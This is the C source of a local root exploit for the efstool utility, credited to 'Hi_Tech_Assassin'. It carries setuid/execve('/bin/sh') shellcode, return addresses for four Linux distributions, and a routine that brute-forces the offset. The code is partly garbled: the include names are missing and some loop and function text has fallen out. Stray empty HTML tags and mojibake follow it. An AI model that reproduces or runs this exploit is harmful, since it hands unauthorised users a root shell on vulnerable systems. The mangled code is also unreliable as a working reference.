/* efstool local exploit(brute force capabilities) * * http://www.t3chware.net, * email: root@t3chware.net * * coded by: Hi_Tech_Assassin */ #include #include #include #include #include #define NOP 0x90 #define LEN 3000 char shellcode[]= "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; struct { int no; char *descr; long ret; char path[256]; }target[] = { {1," Redhat 7.2", 0xbffff340,"/usr/bin/efstool"}, {2," SuSE Linux 8.0",0xbfffeb43 ,"/opt/gnome/bin/efstool"}, {3," Mandrake 8.2", 0xbffff080,"/usr/bin/efstool"}, {4," Slackware 8.1", 0xbffff080,"/usr/bin/efstool"} }; long esp(void) { __asm("movl %esp,%eax"); } void exploit(long ret, char **path) { char payload[LEN]; int i; for(i=0;i=-3000)) { if((pid=fork())==0) { exploit(ret,path); exit(0); } else perror("fork failed"); if(waitpid(pid,NULL, 0)!= pid) perror("waitpid error"); if(x>=3000) { ret=esp(); x=-1; } else if(x<=3000&&x>=0) { ret+=offset; x+=offset; } else if(x>=-3000&&x<0) { ret-=offset; x-=offset; } printf("%d\n\n",x); } printf("brute force complete..\n\n"); system("id"); } int main(int argc, char **argv) { int cnt, sel; char *offset; long returnaddr; if(argc == 1) { usage((char **)argv[0]); exit(1); } while((cnt = getopt(argc,argv,"t:b:o:")) != EOF) { switch(cnt) { case 't': //target distro sel = atoi(optarg); exploit(target[sel-1].ret,(char **)target[sel-1].path); break; case 'b': //brute force bruteforce((char **)target[sel-1].path); break; case 'o': //offset offset = atoi(optarg); returnaddr=esp()+offset; sel = atoi(optarg); exploit(returnaddr,(char **)target[sel-1].path); break; default: usage(&argv[0]); break; } } return(0); }
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß